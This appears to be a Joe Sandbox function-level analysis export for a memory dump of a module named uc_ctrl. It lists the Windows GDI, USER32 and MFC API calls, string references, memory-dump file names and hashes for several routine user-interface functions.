Function 6CB56EB1 Relevance: 25.9, APIs: 17, Instructions: 406windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB56EBB
GetObjectW.GDI32(?,00000054,?), ref: 6CB56F50
CreateCompatibleDC.GDI32(00000000), ref: 6CB570E3
GetObjectW.GDI32(?,00000018,?), ref: 6CB57104
SelectObject.GDI32(?,?), ref: 6CB57123
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6CB57157
SelectObject.GDI32(?,00000000), ref: 6CB57170
CreateCompatibleDC.GDI32(?), ref: 6CB57190
SelectObject.GDI32(?,00000000), ref: 6CB571A9
SelectObject.GDI32(?,00000000), ref: 6CB571C0
DeleteObject.GDI32(00000000), ref: 6CB571C7
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6CB571EF
GetPixel.GDI32(?,00000000,00000000), ref: 6CB57235
SetPixel.GDI32(?,00000000,00000000,00000000), ref: 6CB5734B
SelectObject.GDI32(?,?), ref: 6CB57381
SelectObject.GDI32(?,00000000), ref: 6CB5738E
DeleteObject.GDI32(?), ref: 6CB5739A

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$DeletePixel$BitmapH_prolog3_
String ID:
API String ID: 1136552931-0
Opcode ID: 029e98848320cc07de5dbd3351f02c28643eb008f7ae0f5918b62dd9c559d928
Instruction ID: 569aaca76f2af422645017fc73265647ad9b1b383087564b92d2dd8b94f28ea8
Opcode Fuzzy Hash: 029e98848320cc07de5dbd3351f02c28643eb008f7ae0f5918b62dd9c559d928
Instruction Fuzzy Hash: 18E117B2F10259EADB166F50CD44BDEBB78FF02340F6085C4A989B21A1FB714DA58F90

Function 6CB4B6C6 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 249windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB4B6CD
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 6CB4B71C
ClientToScreen.USER32(?,0000004E), ref: 6CB4B751
SendMessageW.USER32(?,0000113E,00000000,00000004), ref: 6CB4B7B0
SHGetDesktopFolder.SHELL32(?), ref: 6CB4B7D6
GetParent.USER32(?), ref: 6CB4B801

Strings

$, xrefs: 6CB4B920

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageSend$ClientDesktopFolderH_prolog3_ParentScreen
String ID: $
API String ID: 2832117902-3993045852
Opcode ID: 8327892b0d58f881a6cce8a0db196ac01b1b78640faa2c65940e357df747b581
Instruction ID: 099dfb088576a8c8261552322c543cd5d3d616a82008ae34a921a66fa339b0db
Opcode Fuzzy Hash: 8327892b0d58f881a6cce8a0db196ac01b1b78640faa2c65940e357df747b581
Instruction Fuzzy Hash: 97919F71A05649AFDF04CFA4C884AEEBBB9FF08314F148119EA25A7B54DB30D904DBA4

Function 6CB57D5C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 214COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB57D66
GetObjectW.GDI32(00000000,00000018,?), ref: 6CB57DA4
CreateCompatibleDC.GDI32(00000000), ref: 6CB57DE3
SelectObject.GDI32(?,00000000), ref: 6CB57E06
GetObjectW.GDI32(?,00000054,?), ref: 6CB57E4C
CreateDIBSection.GDI32(?,?), ref: 6CB57EAE
CreateCompatibleDC.GDI32(?), ref: 6CB57EE8
SelectObject.GDI32(?,00000000), ref: 6CB57F01

Strings

(, xrefs: 6CB57E97

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Object$Create$CompatibleSelect$H_prolog3_Section
String ID: (
API String ID: 1338481308-3887548279
Opcode ID: f5642de40a7b6981f64bbb700153eff3bda16541155d974bc16a6e7ec2590178
Instruction ID: d33638cf7b56f9d3b94f4582f5d86baab5c26e6c983a1f0c5dfb7bbf281a1769
Opcode Fuzzy Hash: f5642de40a7b6981f64bbb700153eff3bda16541155d974bc16a6e7ec2590178
Instruction Fuzzy Hash: DEA13974A01754DFDB61CF64C844B9ABBB5FF09304F1084A9E94DE7650EB30AA99CF20

Function 6CBCDD36 Relevance: 24.4, APIs: 16, Instructions: 391COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CBCDD3D
GetCursorPos.USER32(?), ref: 6CBCDDFC
IsRectEmpty.USER32(?), ref: 6CBCDE30
IsRectEmpty.USER32(?), ref: 6CBCDE57
IsRectEmpty.USER32(?), ref: 6CBCDE73
GetWindowRect.USER32(?,?), ref: 6CBCDE9E
GetWindowRect.USER32(?,?), ref: 6CBCDECD
PtInRect.USER32(?,?,?), ref: 6CBCDF1A
OffsetRect.USER32(?,?,00000000), ref: 6CBCDF2F

Part of subcall function 6CBFB455: __EH_prolog3.LIBCMT ref: 6CBFB45C
Part of subcall function 6CBFB455: SetRectEmpty.USER32 ref: 6CBFB55C
Part of subcall function 6CBFB455: SetRectEmpty.USER32(?), ref: 6CBFB563

SetRectEmpty.USER32(?), ref: 6CBCDF56
OffsetRect.USER32(?,?,?), ref: 6CBCE0EA
IsRectEmpty.USER32(?), ref: 6CBCE10A
IsRectEmpty.USER32(?), ref: 6CBCE141
PtInRect.USER32(?,00000000,00000000), ref: 6CBCE155
OffsetRect.USER32(?,00000000,00000000), ref: 6CBCE17E
IsRectEmpty.USER32(?), ref: 6CBCE199

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$Empty$Offset$Window$CursorH_prolog3H_prolog3_
String ID:
API String ID: 359163869-0
Opcode ID: 5fbc6b72ea3a81177dbe4d97c8fb64533c5313e5ad938a63f3cdfdcabf8084cd
Instruction ID: 0afe97814d9b069860fc410a84b0ac748af7abc351d8ba9a764fa9719077ab39
Opcode Fuzzy Hash: 5fbc6b72ea3a81177dbe4d97c8fb64533c5313e5ad938a63f3cdfdcabf8084cd
Instruction Fuzzy Hash: 58E1AF71B01285DFDF05CFA4C884AAEBBB6FF85708F144069E804AB654EB35D946CF92

Function 6CB25588 Relevance: 24.2, APIs: 16, Instructions: 233windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB2558F
CreateCompatibleDC.GDI32(00000000), ref: 6CB255E1
CreateCompatibleDC.GDI32(00000000), ref: 6CB255F9
CreateCompatibleDC.GDI32(00000000), ref: 6CB25611
GetObjectW.GDI32(00000004,00000018,?), ref: 6CB25631
CreateBitmap.GDI32(?,?,?,?,00000000), ref: 6CB25657
CreateBitmap.GDI32(00000008,00000008,00000001,00000001,6CC86518), ref: 6CB2567A
CreatePatternBrush.GDI32(?), ref: 6CB2568C

Part of subcall function 6CB25CD2: DeleteObject.GDI32(00000000), ref: 6CB25CE1

CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 6CB256AE

Part of subcall function 6CB26249: SelectObject.GDI32(0000005C,?), ref: 6CB26252

GetPixel.GDI32(?,00000000,00000000), ref: 6CB256F3

Part of subcall function 6CB26355: SetBkColor.GDI32(?,?), ref: 6CB2636A
Part of subcall function 6CB26355: SetBkColor.GDI32(?,?), ref: 6CB2637C

BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6CB25719
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00EE0086), ref: 6CB25741
FillRect.USER32(?,?,?), ref: 6CB257A3
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 6CB257D1
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,008800C6), ref: 6CB257EC
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 6CB25803

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Create$BitmapCompatibleObject$Color$BrushDeleteFillH_prolog3_PatternPixelRectSelect
String ID:
API String ID: 1818846147-0
Opcode ID: 378a490e3dc1e7e01a3d006ed35fe9d975767496931c60b185fbc1ef5819628b
Instruction ID: 0cf9db45aa5555967c7a57c4ba554c2b8da74c04923b957939ce8ecb27f8103f
Opcode Fuzzy Hash: 378a490e3dc1e7e01a3d006ed35fe9d975767496931c60b185fbc1ef5819628b
Instruction Fuzzy Hash: 7491EFB2D01248AFDF019FE5CD849EEBF79FF08348F140029B509AA664DB359E19DB20

Function 6CB4BA0D Relevance: 24.2, APIs: 16, Instructions: 181windowstringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB4BA17
SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 6CB4BA3B
SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 6CB4BA4C
SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 6CB4BAF5
SendMessageW.USER32(?,00001102,00000002,00000000), ref: 6CB4BB0A
SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 6CB4BB1D
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000208), ref: 6CB4BB53
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000208), ref: 6CB4BB76
lstrcmpiW.KERNEL32(?,?,?,?,00000004), ref: 6CB4BB8E
SendMessageW.USER32(?,0000110A,00000001,?), ref: 6CB4BBB6
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 6CB4BC25
SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 6CB4BC3C
SendMessageW.USER32(?,00001102,00000002,00000000), ref: 6CB4BC51
SendMessageW.USER32(?,00001114,00000000,00000000), ref: 6CB4BC63
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 6CB4BC85
RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00000004), ref: 6CB4BC95

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageSend$FileInfo$H_prolog3_RedrawWindowlstrcmpi
String ID:
API String ID: 3933830903-0
Opcode ID: 8028897e387466367b9e25c580e0604cc80027e346d91277a85d77037f9cc98c
Instruction ID: eb5ce4f2561fff421c1f003a5fcc8a9a78d0b9ddd59d9872e30ff72cf92b21af
Opcode Fuzzy Hash: 8028897e387466367b9e25c580e0604cc80027e346d91277a85d77037f9cc98c
Instruction Fuzzy Hash: 34618030B44B44AFEB218F64CC89FAB7A78FB0A705F408168F749A6694DBB0D944DF10

Function 6CB5A58A Relevance: 24.2, APIs: 16, Instructions: 158windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB5A591
CreateCompatibleDC.GDI32(00000000), ref: 6CB5A5BE
GetObjectW.GDI32(?,00000018,?), ref: 6CB5A5D7
SelectObject.GDI32(?,?), ref: 6CB5A5EF
CreateCompatibleBitmap.GDI32(?,0000000F,00000010), ref: 6CB5A61A
SelectObject.GDI32(?,00000000), ref: 6CB5A62B

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Object$CompatibleCreateSelect$BitmapH_prolog3
String ID:
API String ID: 1715795092-0
Opcode ID: 83f414fb9817187672084c9e281ad76a0aadded6306d67dcbc41e8c39dcbfc84
Instruction ID: ee479013c4d0e8caeaf36489ffb1bb4e97b9cc1491c009ad4c6fbb4f215f3c97
Opcode Fuzzy Hash: 83f414fb9817187672084c9e281ad76a0aadded6306d67dcbc41e8c39dcbfc84
Instruction Fuzzy Hash: A0517570A01259EFCF119FA4CC489EEBF79FF0A704F500025E915B6690EB308A66CFA1

Function 6CB3B7A2 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 140registrywindowCOMMON

Download Yara Rule

APIs

RegisterWindowMessageW.USER32(commdlg_LBSelChangedNotify,?,Function_0002C806), ref: 6CB3B7FC
RegisterWindowMessageW.USER32(commdlg_ShareViolation,?,Function_0002C806), ref: 6CB3B80C
RegisterWindowMessageW.USER32(commdlg_FileNameOK,?,Function_0002C806), ref: 6CB3B81C
RegisterWindowMessageW.USER32(commdlg_ColorOK,?,Function_0002C806), ref: 6CB3B82C
RegisterWindowMessageW.USER32(commdlg_help,?,Function_0002C806), ref: 6CB3B83C
RegisterWindowMessageW.USER32(commdlg_SetRGBColor,?,Function_0002C806), ref: 6CB3B84C

Part of subcall function 6CB1FBA5: __CxxThrowException@8.LIBVCRUNTIME ref: 6CB1FBB9

Strings

commdlg_FileNameOK, xrefs: 6CB3B812
commdlg_LBSelChangedNotify, xrefs: 6CB3B7F7
commdlg_ColorOK, xrefs: 6CB3B822
commdlg_help, xrefs: 6CB3B832
commdlg_SetRGBColor, xrefs: 6CB3B842
commdlg_ShareViolation, xrefs: 6CB3B802

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageRegisterWindow$Exception@8Throw
String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
API String ID: 1943434037-3888057576
Opcode ID: 71d2cbfa291eb1bf524aba4a808bc91a9c55fbd10a4cd4114046d07bd6761dca
Instruction ID: d2e613759d9d010d2172c58eb6baa15d3c49e1e218e8a9b227e4cd2e554d19cb
Opcode Fuzzy Hash: 71d2cbfa291eb1bf524aba4a808bc91a9c55fbd10a4cd4114046d07bd6761dca
Instruction Fuzzy Hash: E5417D71B01660DBDF01AF38C4945BE7BB5FF4A318B49262DE919A3B44DB34D802CB92

Function 6CB3DC59 Relevance: 22.7, APIs: 15, Instructions: 173windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB3DC60
GetIconInfo.USER32(?,?), ref: 6CB3DD01
GetObjectW.GDI32(?,00000018,?), ref: 6CB3DD10
CreateCompatibleDC.GDI32(00000000), ref: 6CB3DD3F
CopyImage.USER32(?,00000000,00000000,00000000,00002000), ref: 6CB3DD5B
SelectObject.GDI32(?,00000000), ref: 6CB3DD70
FillRect.USER32(?,?,-00000098), ref: 6CB3DDAB
DrawIconEx.USER32(?,00000000,00000000,?,?,?,00000000,00000000,00000003), ref: 6CB3DDCC
SelectObject.GDI32(?,?), ref: 6CB3DDDD
DeleteObject.GDI32(?), ref: 6CB3DDE6
DeleteObject.GDI32(?), ref: 6CB3DDFB
DeleteObject.GDI32(?), ref: 6CB3DE04
DestroyIcon.USER32(?,0000006C,6CB3D118,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,MFCButton_ImageType,?,00000000,00000000,MFCButton_CursorType), ref: 6CB3DE57
DestroyIcon.USER32(?), ref: 6CB3DE64
DestroyIcon.USER32(?), ref: 6CB3DE6F

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Object$Icon$DeleteDestroy$Select$CompatibleCopyCreateDrawFillH_prolog3_ImageInfoRect
String ID:
API String ID: 2061919445-0
Opcode ID: b596cfa647af24633eacc3b3be3ba01cbca7a2efe0891e305bda54a08b7245b7
Instruction ID: a6db482848428fc7f1f4ef6c6b13a2216bc6e54f2c802b8771ab5d0b8347fe16
Opcode Fuzzy Hash: b596cfa647af24633eacc3b3be3ba01cbca7a2efe0891e305bda54a08b7245b7
Instruction Fuzzy Hash: 65618CB1E21169AFDF01CFA4D848AEEBBB5FF49300F145129E815E7650DB319905CF50

Function 6CB3CE6B Relevance: 21.3, APIs: 2, Strings: 10, Instructions: 279windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB3CE72

Part of subcall function 6CB3A22E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 6CB3A243

Part of subcall function 6CB846CA: __EH_prolog3.LIBCMT ref: 6CB846D1

Part of subcall function 6CB1A044: __EH_prolog3.LIBCMT ref: 6CB1A0F2

Part of subcall function 6CB84748: __EH_prolog3.LIBCMT ref: 6CB8474F

LoadIconW.USER32(?,00000000), ref: 6CB3D104

Strings

MFCButton_Autosize, xrefs: 6CB3CF26
MFCButton_CursorType, xrefs: 6CB3CFF6
MFCButton_ImageOnTop, xrefs: 6CB3D142
MFCButton_ImageType, xrefs: 6CB3D047
MFCButton_FullTextTool, xrefs: 6CB3CF9F
MFCButton_Style, xrefs: 6CB3CEC1
MFCButton_Tooltip, xrefs: 6CB3CF6D
MFCButton_ImageOnRight, xrefs: 6CB3D164
MFCButton_ImageID, xrefs: 6CB3D09E
TRUE, xrefs: 6CB3CFC1

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: H_prolog3$ByteCharIconLoadMultiWide
String ID: MFCButton_Autosize$MFCButton_CursorType$MFCButton_FullTextTool$MFCButton_ImageID$MFCButton_ImageOnRight$MFCButton_ImageOnTop$MFCButton_ImageType$MFCButton_Style$MFCButton_Tooltip$TRUE
API String ID: 3563906663-3825445498
Opcode ID: f826d70ececf0510b87d17860c109c900ddba939d48a5d2268f36a4edbe82aee
Instruction ID: 2c9a2f9197f6fc09d9ce5b8158267e44c06aad00801d920d941f4bd47a229f52
Opcode Fuzzy Hash: f826d70ececf0510b87d17860c109c900ddba939d48a5d2268f36a4edbe82aee
Instruction Fuzzy Hash: E5A17C709111A9AADF05EFB4DCA4AFEB7BDFF1020CF101519E415A7A90EB389D09CB21

Function 6CB55E4A Relevance: 21.2, APIs: 2, Strings: 10, Instructions: 189COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB55E51

Part of subcall function 6CBC770F: __EH_prolog3.LIBCMT ref: 6CBC7716

GetWindowRect.USER32(?,?), ref: 6CB55F3A

Part of subcall function 6CB2D542: GetDlgCtrlID.USER32(?), ref: 6CB2D54D

Part of subcall function 6CB5360E: GetWindowRect.USER32(?,?), ref: 6CB5361C

Strings

RecentFrameAlignment, xrefs: 6CB55FEF
RectRecentFloat, xrefs: 6CB55FB2
Panes, xrefs: 6CB55E5E
IsFloating, xrefs: 6CB5602A
%TsPane-%d, xrefs: 6CB55EA4
%TsPane-%d%x, xrefs: 6CB55EBB
RectRecentDocked, xrefs: 6CB55FD2
RecentRowIndex, xrefs: 6CB5600E
MRUWidth, xrefs: 6CB56049
PinState, xrefs: 6CB56068

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
